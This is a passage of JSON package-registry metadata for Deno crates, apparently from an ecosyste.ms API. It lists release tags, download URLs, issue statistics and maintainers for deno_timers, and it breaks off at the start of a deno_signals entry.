aff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-30T02:55:30.527Z","dependent_packages_count":3,"downloads":75835,"downloads_period":"total","dependent_repos_count":6,"rankings":{"downloads":8.911100534137182,"dependent_repos_count":9.242515875415783,"dependent_packages_count":9.170226439345255,"stargazers_count":0.0022664944130912717,"forks_count":0.058173356602675974,"docker_downloads_count":null,"average":5.476856539982798},"purl":"pkg:cargo/deno_timers","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_timers","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_timers","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_timers/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-29T03:03:41.777Z","issues_count":6626,"pull_requests_count":9646,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1532231.9017556966,"issues_closed_count":3798,"pull_requests_closed_count":8030,"pull_request_authors_count":580,"issue_authors_count":2473,"avg_comments_per_issue":2.50814971325083,"avg_comments_per_pull_request":0.7193655401202571,"merged_pull_requests_count":7012,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":666,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1323857.4606060607,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":660,"past_year_pull_request_authors_count":184,"past_year_issue_authors_count":368,"past_year_avg_comments_per_issue":1.2477477477477477,"past_year_avg_comments_per_pull_request":1.1131447587354408,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":14,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_timers/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_timers/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_timers/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_timers/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_timers/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_timers/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:34.425Z","updated_at":"2022-11-07T18:29:34.425Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:24.062Z","updated_at":"2023-07-18T22:41:24.062Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11889442,"name":"deno_signals","ecosystem":"cargo","description":"Signals for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":49,"first_release_published_at":"2025-07-08T11:29:09.304Z","latest_release_published_at":"2026-08-27T15:19:56.339Z","latest_release_number":"0.49.0","last_synced_at":"2026-09-07T22:57:42.562Z","created_at":"2025-07-08T11:31:10.744Z","updated_at":"2026-09-07T22:57:42.562Z","registry_url":"https://crates.io/crates/deno_signals/","install_command":"cargo install deno_signals","documentation_url":"https://docs.rs/deno_signals/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and 